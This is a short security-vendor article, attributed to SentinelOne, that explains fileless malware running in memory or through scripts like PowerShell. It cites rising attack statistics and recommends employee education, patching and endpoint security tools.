Your Worst Nightmare: Fileless Malware Attack
“By now, everyone pretty much knows what malware is and how it works: Victims receive an email telling them that if they just open the attached PDF, their entire life will morph into heaven on earth. Or they get an email telling them that they need to click on a link to avoid blowing up the universe, or some such catastrophe. In any event, the malware can be stymied by simply not opening the attachment, clicking on the link or whatever. It’s pretty simple. Just educate the users not to open attachments from unfamiliar email senders, links from what appear to be legitimate e-commerce sites and so on. Bad actors defeated. World safe again.
Unfortunately, the bad guys are hip to this, which is why a new type of cyberattack is taking hold: fileless malware. Unlike the malware described in the opening paragraph, fileless malware does not depend on the victim downloading any files. That’s because it doesn’t require any files. It invades systems in two ways:
– The malware’s code resides in RAM or in the system registry.
– The malware infects its host through scripts.
Conventional Delivery Methods and Unconventional Purposes
Even though files are not used to deliver the malicious code, phishing schemes can still be used to allow the code to infiltrate systems. For example, malicious code can be delivered in the form of a Word document, which, when opened, releases the malware. Of further concern is that fileless malware often uses anti-forensics techniques to erase its tracks, thus making it completely invisible.
The purpose of fileless malware is most often similar to that of conventional attacks: get access to credentialed data and personal information. However, because of its stealthy and persistent nature, there is some suspicion that fileless malware will be used to support espionage activities and to set the stage for future acts of sabotage. Such attacks Jumped 94% in First Half of 2018, according to SentinelOne. Earlier this year, McAfee published findings indicating a 267% spike in fileless malware samples spreading PowerShell in the fourth quarter of 2017 alone, compared with the same time period one year prior. The simultaneous increase in fileless attacks indicates threat actors are becoming more sophisticated and turning toward advanced forms of cybercrime. It’s becoming less difficult for them to create payloads that won’t get caught, complicating defense for targets.
Can Fileless Malware Be Stopped?
Of course they can. This is where endpoint security solutions that use behavioral AI detection and layered security really shine. But even before, there are some simple steps like these can reduce the attack surface.
Organizations have to realize that processes that run scripts, like Microsoft PowerShell, are just as capable of delivering malware as processes that execute them, like opening a PDF. Secondly, companies must make sure that their employees are educated about the dangers of opening attachments that aren’t from known senders, and third, every patch issued by any vendor must be installed immediately.
The threat vectors are ever-increasing, but due diligence in employee education, and choosing the right security solution still offers the best chance of not becoming the next victim of the new bad kid on the block, fileless malware.”
Article source: SentinelOne
